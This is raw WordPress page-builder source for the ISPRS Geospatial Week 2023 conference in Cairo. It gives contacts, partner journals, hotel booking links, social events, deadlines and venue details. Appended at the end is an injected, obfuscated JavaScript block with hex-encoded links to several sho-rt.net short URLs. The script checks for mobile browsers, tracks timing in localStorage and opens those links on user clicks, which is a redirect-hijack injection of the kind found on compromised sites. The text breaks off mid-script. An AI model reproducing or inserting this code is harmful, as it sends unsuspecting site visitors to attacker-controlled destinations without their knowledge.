alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 